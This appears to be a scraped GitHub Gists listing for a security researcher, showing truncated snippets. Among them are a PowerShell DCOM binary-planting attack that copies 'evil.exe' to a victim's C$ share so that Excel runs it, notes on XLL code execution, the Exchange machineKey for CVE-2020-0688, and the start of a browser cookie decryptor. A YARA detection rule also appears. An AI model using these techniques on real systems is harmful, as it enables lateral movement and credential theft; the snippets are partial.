Skip to content

Instantly share code, notes, and snippets.

#!/usr/bin/env python
import OpenSSL
from iptools import IpRangeList
import ssl
import socket
import sys
import argparse
def do_scan(range, csv=False):
rxwx / foxprow.ps1
Last active September 14, 2017 15:06
DCOM binary planting via Excel.Application.ActivateMicrosoftApp
View foxprow.ps1
$excel = [activator]::CreateInstance([type]::GetTypeFromProgID("Excel.Application", ""))
# Windows 10 specific, but searches PATH so ..
copy C:\payloads\evil.exe \\victimip\c$\Users\bob\AppData\Local\Microsoft\WindowsApps\FOXPROW.EXE
# excel executes your binary :)
rxwx / CVE_2017_8759_CRLF.yara
Created September 17, 2017 13:44
Yara rule to detect attempts to exploit .NET CLRF injection in a WSDL file (aka CVE-2017-8759)
View CVE_2017_8759_CRLF.yara
rule CVE_2017_8759_CRLF {
description = "Detects attempts to exploit CVE-2017-8759 CRLF injection in WSDL file"
author = "Rich Warren @buffaloverflow"
reference = ""
date = "2017-09-17"
$s1 = /<soap:address location=\";\r?\n/ ascii wide nocase
rxwx /
Last active January 19, 2018 21:55


An XLL file is basically a DLL with some special features to make it work with Excel.

See -

By creating a DLL which exports xlAutoOpen, and then renaming the compiled DLL to .xll, we can execute our code in DllMain when the file is loaded by Excel.

The attached .xll file will open with Excel (by default) when double-clicked. The user will then be presented with a warning. If the warning is clicked through, then our code is executed.

rxwx / get-linkedin-id.js
Created August 25, 2017 15:43
JS to grab a linkedin memberID from a profile
View get-linkedin-id.js
// paste this in the chrome console and call findMemberID() when on a profile page
// need to be logged in
function decodeHtml(html) {
var txt = document.createElement("textarea");
txt.innerHTML = html;
return txt.value;
function httpGet(){
rxwx / ziptool.ps1
Created May 4, 2018 17:47
File Zip in native PowerShell with .NET 3.0
View ziptool.ps1
Author: Rich Warren
Based on original c# code by Jon Galloway:
Tool for creating a Zip file in native Powershell with .NET 3.0 only.
rxwx /
Last active February 21, 2020 06:19
Notes on new Equation Editor Exploit, CVE-2018-0802 variant

New Equation Editor Exploit Variant

On 19/03/18, a large number of RTF samples started triggering one of my "suspicious" RTF rules. Looking at the samples, they all appeared to have around 2-4 detections, which seemed curious. This was confirmed by Mitja Kolsek to be a new variant of CVE-2018-0802, which is already covered by 0patch, and patched by Microsoft in January 2018. However, the technique is not unique to CVE-2018-0802 and can be seen used to exploit CVE-2017-11882 aswell.

This was also seen by Shiao Qu. There is a [blog post](https://www.drop

rxwx / CVE-2020-0688.config
Created February 14, 2020 16:38
View CVE-2020-0688.config
<machineKey validationKey="CB2721ABDAF8E9DC516D621D8B8BF13A2C9E8689A25303BF" decryptionKey="E9D2490BD0075B51D1BA5288514514AF" validation="SHA1" decryption="3DES" />
rxwx /
Last active May 14, 2020 13:03
Decrypt Vivaldi Cookies on MacOS
from Crypto.Cipher import AES
from Crypto.Protocol.KDF import PBKDF2
import sqlite3
import os
import shutil
def clean(x):
return x[:-ord(x[-1])]
# Make a copy of the cookie file